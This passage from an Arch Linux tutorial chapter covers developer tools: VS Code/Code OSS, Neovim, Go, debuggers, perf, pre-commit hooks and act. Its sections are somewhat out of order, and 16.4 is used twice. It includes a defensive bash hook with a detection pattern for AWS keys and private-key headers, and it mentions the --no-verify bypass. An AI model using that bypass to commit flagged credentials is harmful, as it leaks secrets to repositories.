It's undeniable that VS Code is the current champion. However, the binary distributed by Microsoft contains silent telemetry (it collects your usage metrics) under a closed, proprietary license.
As an Arch Linux user, you have access to Code OSS (Open Source Software), which is the same program built directly from source by the Arch community, without Microsoft's invasive privacy additions (telemetry removed).
# The pure, free version in the official repos
sudo pacman -S code
- Practical problem: since this free build does not pay licenses to Microsoft, Microsoft's legal policy prohibits it from connecting to the official extensions "Marketplace", forcing you to use the free marketplace (Open VSX).
- Solution (if you need Microsoft's proprietary extensions, e.g., Remote-SSH or Pylance): install the official proprietary build from the AUR:
yay -S visual-studio-code-bin
16.3.2 Neovim: The UNIX Developer's Editor (Terminal)
Neovim is not just an update of vim. It's a massive rewrite of its core that lets it run asynchronously and, above all, use the Lua language for ultra-fast configuration, bringing static code analyzers (LSP, the Language Server Protocol, the engine behind VS Code) directly into your console.
sudo pacman -S neovim
If you run nvim bare, the learning curve is monumental (you can't even move through the text without knowing that 'j' goes down, 'k' goes up, and quitting requires the command :wq). To enjoy IDE power without configuring it for a month straight, install a community-maintained Neovim distribution, which turns the sterile console into a spectacular visual editor in 30 seconds by injecting hundreds of Lua scripts (extreme ricing).
Example Neovim distribution: NvChad. Make sure your Nerd Fonts are correctly installed (Chapter 7) and run:
# Back up any previous config
mv ~/.config/nvim ~/.config/nvim.bak
# Download the ultra-fast NvChad framework
git clone https://github.com/NvChad/starter ~/.config/nvim
# Open it for the first time so it compiles its plugins itself:
nvim
You'll be amazed to find that inside your old black terminal lives a fluid IDE with millisecond autocompletion, C++ parsing, and a tree-style file explorer, using 2% of the RAM VS Code would need.
16.4 End of Path (System Conclusion) ↑ Start
It's been a long journey through the intricacies of hardware and software. We started in a black terminal with a blinking UEFI boot error. We formatted blocks, mounted blind partitions, chrooted our consciousness into the system's brain, and built the base universe with pacstrap.
Next, we built the skeleton, equipping it with muscles (custom TKG kernel, C++ optimization flags -march=native), a nervous system (NetworkManager and PipeWire), and an unbreakable titanium frame (AppArmor, LUKS, and UFW). Finally, we gave it vision and life with Wayland, composing crystalline and fluid art thanks to Hyprland and our obsessive Ricing work, culminating in the forging of isolated Docker and Python environments to transform the machine into the production workstation of any engineer's dreams.
You've mastered the fundamental architecture of the world's most malleable operating system, learned commands that technical manuals assume you already know, and understood the theory behind why things sometimes break. The distribution won't fail on its own. You have complete control over every package. Arch Linux doesn't assume you're an idiot; it assumes you are, or will become, an elite software professional.
Welcome. The manual is never-ending. In fact, it's always up-to-date on the Arch Wiki. Good luck.
16.4 Modern Compiled Languages and Debugging (Go and Rust) ↑ Home
Beyond C/C++ and interpreted languages like Python, Arch Linux is a paradise for modern systems developers (backend and CLI) working in languages like Go (Golang) and Rust, which dominate the cloud computing market.
16.4.1 The Go Ecosystem
Unlike Node.js or Python, Go's compiler produces statically linked, self-contained binaries by default. You can install the latest version directly with pacman without fear of breaking your system: a pure-Go program doesn't link against shared C libraries (only programs that use cgo do).

sudo pacman -S go

Historically, Go required a strict folder hierarchy called GOPATH (typically ~/go). Today, thanks to Go Modules, you can start a project in any corner of your hard drive:
mkdir mi_api_go && cd mi_api_go
# Initialise the module tracker, named after the repository you will push it to
go mod init github.com/francesc/mi_api_go

To compile a Go program on Arch Linux and have the compiler cross-compile it so that it runs on an older 32-bit Windows server, the command is absurdly simple thanks to the native toolchain:

GOOS=windows GOARCH=386 go build -o mi_programa.exe

This works out of the box only for pure-Go code. If the project (or a dependency) uses cgo, either set CGO_ENABLED=0 so the build fails loudly instead of silently linking the host's C toolchain, or point CC at a MinGW cross-compiler.

16.4.2 Debugging (GDB and Delve)
Finding errors by sprinkling print() statements through your code is for amateurs. Software engineers use debuggers. A debugger freezes the program in RAM at the exact moment a fault occurs (or at a "breakpoint" you set), allowing you to inspect its variables from the inside.
- For C/C++ and Rust, GDB (GNU Debugger) or LLDB (from the LLVM project) is used; the Rust toolchain also ships the rust-gdb and rust-lldb wrappers, which load pretty-printers for Rust types:
sudo pacman -S gdb lldb
- For Go, GDB knows nothing about goroutines, the Go runtime or Go's type system, so stepping through Go code with it quickly becomes painful. The industry standard, maintained by the go-delve project, is Delve:
sudo pacman -S delve

To catch a bug in your Go program, instead of running go run, you start the debugger from the package directory:

dlv debug

In the Delve console, type break main.go:25 (stop at line 25), then continue. The program runs at full speed until it reaches line 25 and pauses there. You can then type print miVariable to view its live content and discover why your software was failing.
16.4.3 Extreme Performance Profiling (Perf)
If your program is bug-free but runs slowly, and you don't know which function is eating the time, you use the kernel profiler: perf. perf samples your program using the hardware performance counters built into the silicon of your processor (Intel/AMD).

sudo pacman -S perf
# Profile the program until it exits, recording call graphs (-g)
sudo perf record -g ./mi_programa_lento
# Read the report
sudo perf report

The terminal will display a hierarchical tree revealing that, for example, 45% of your program's CPU time is spent inside a single for loop. With debug symbols in the binary (compile with -g and don't strip it), perf annotate narrows that down to the exact source line, say line 104, and recording a cache event (perf record -e cache-misses) tells you whether the culprit is L1 cache misses. It's an atomic-level X-ray of your software. The sudo isn't mandatory, either: the kernel.perf_event_paranoid sysctl controls what unprivileged users may measure (lower it, for instance to 1, to include kernel-side samples of your own processes), and profiling as your own user is safer than running an untested binary as root.
16.5 Local Continuous Integration (CI/CD) and Git Hooks ↑ Home
Professional development dictates that no code should land in the shared repository (GitLab/GitHub), let alone in production, without first passing a battery of automated tests and static analysis. In a company, these CI/CD pipelines run in the cloud and consume paid runner time.
On your Arch Linux system, you can emulate that pipeline locally and avoid pushing broken code in the first place.
16.5.1 Git Hooks (the first barrier for commits)
Git hooks are executable scripts stored in your repository's .git/hooks/ directory (written in bash or any other interpreter) that Git runs automatically at certain points. The most important is pre-commit: if the script exits with a non-zero status, Git aborts git commit and refuses to record the change, forcing you to fix it first. Two caveats a security engineer should keep in mind: .git/hooks/ is not tracked, so hooks are not cloned with the repository and must be installed on every machine, and any developer can skip them with git commit --no-verify. Hooks are a convenience that catches mistakes early, not a security boundary; enforce the same checks again on the server side (CI, branch protection).
In modern projects (for example Python or JavaScript), instead of writing bash scripts by hand, the pre-commit manager (written in Python) is used:
sudo pacman -S pre-commit

In the root of your project, create a file .pre-commit-config.yaml:

repos:
  - repo: https://github.com/pre-commit/pre-commit-hooks
    rev: v4.4.0
    hooks:
      - id: trailing-whitespace   # removes trailing whitespace
      - id: end-of-file-fixer     # ensures a final newline
      - id: check-yaml            # ensures your YAML files are not broken

You install the barrier with the command pre-commit install, which writes the hook script into .git/hooks/pre-commit. The next time you run git commit -m "Mi cambio", pre-commit runs the configured hooks over the staged files. If a hook rewrites a file (stripping trailing whitespace, for instance), the commit is aborted so you can review and re-stage the change; only when every hook passes is the commit created. Keep rev pinned to a tag (or, stricter still, a commit hash) as shown: each hook repository is code fetched from GitHub and executed on your machine.
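The hand-written hook described in 16.5.1 is worth seeing in full, because the most valuable thing a pre-commit hook can do is stop a credential from ever entering history. The script below is an added example, not code from the book or from the pre-commit project: it refuses a commit when any staged text file contains an AWS-style access key ID or a PEM private-key header. The file name pre-commit-secrets.sh, the pattern list and the sample files are assumptions for illustration; the pre-commit framework's own detect-private-key hook covers the PEM case if you prefer a managed hook.

```bash
#!/usr/bin/env bash
# Hypothetical pre-commit hook (an added example, not code from the book or from the
# pre-commit project). Install it with:
#   cp pre-commit-secrets.sh .git/hooks/pre-commit && chmod +x .git/hooks/pre-commit
set -eu

# Two patterns worth refusing outright: an AWS access key ID (the documented shape is
# "AKIA" followed by 16 upper-case alphanumerics) and a PEM private-key header.
SECRET_PATTERNS='AKIA[0-9A-Z]{16}|-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----'

# scan_file FILE: report matching lines on stderr; return 1 if any were found, else 0.
scan_file() {
    file="$1"
    # grep -E exits 1 when nothing matches, which is the "clean" case here.
    if hits=$(grep -nE "$SECRET_PATTERNS" -- "$file"); then
        printf 'pre-commit: possible secret in %s:\n%s\n' "$file" "$hits" >&2
        return 1
    fi
    return 0
}

# scan_staged: run scan_file over every file added, copied or modified in the index.
# Returns 1 if any file is flagged. (One path per line, so a file name containing a
# newline would be mishandled; that is an accepted limitation of this example.)
scan_staged() {
    status=0
    list=$(mktemp)
    git diff --cached --name-only --diff-filter=ACM > "$list"
    while IFS= read -r f; do
        # Skip files missing from the worktree and binaries (grep -I treats them as non-matching).
        if [ -f "$f" ] && grep -qI . -- "$f"; then
            scan_file "$f" || status=1
        fi
    done < "$list"
    rm -f "$list"
    return "$status"
}

# Only act as a hook when Git runs this file as .git/hooks/pre-commit; under any other
# name the file just defines the functions, so it can be sourced or tested on its own.
case "$0" in
    */pre-commit|pre-commit)
        if ! scan_staged; then
            echo "pre-commit: commit refused; remove the secret (or, for a genuine false positive, use git commit --no-verify)" >&2
            exit 1
        fi
        ;;
esac
```

Git runs pre-commit hooks from the top of the working tree, which is why the paths printed by git diff --cached can be used as they are. The hook only inspects what is staged, so a secret that is already committed is not caught by it: that needs a history scan, and then a key rotation, because a leaked credential in git history is compromised even after the commit is rewritten.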
16.5.2 GitHub Actions Locally (act)
If you configure GitHub Actions (.github/workflows/main.yml) to spin up Docker containers and test your database every time you push, you normally have to upload the code, wait five minutes on the GitHub website and see whether it fails. If it fails, you fix a comma, push again, and wait another five minutes.
The act tool reads that workflow YAML and, using your local Docker daemon (Chapter 15), brings up Ubuntu runner images on your own Arch Linux computer, executing the jobs without leaving your machine.
It is installed from the AUR (it's written in Go, so it ships as a single binary):

yay -S act

If you stand in your project folder and simply type act, the program downloads a large Ubuntu container image that imitates the GitHub runner, injects your code and runs the jobs (for example npm run test or pytest). If a test fails under act locally, it will fail in the cloud; the reverse isn't guaranteed, because act doesn't reproduce every GitHub feature, so keep the real pipeline as the final gate. Pass secrets with -s NAME=value or --secret-file rather than hard-coding them into the workflow. Using act shrinks the feedback loop from minutes (or hours) to seconds, and you develop at a ferocious speed.
16.6 Final Reflection ↑ Home
You've completed your master's degree. Your Arch Linux isn't just an operating system where you consume content; it's a cybersecurity lab, a server cluster, a cryptographic assembly station, and a cloud orchestration platform. You are the undisputed architect of your own computational domains. May your code always compile on the first pass, and may your system never suffer a kernel panic.
This post is also available in ESPAÑOL.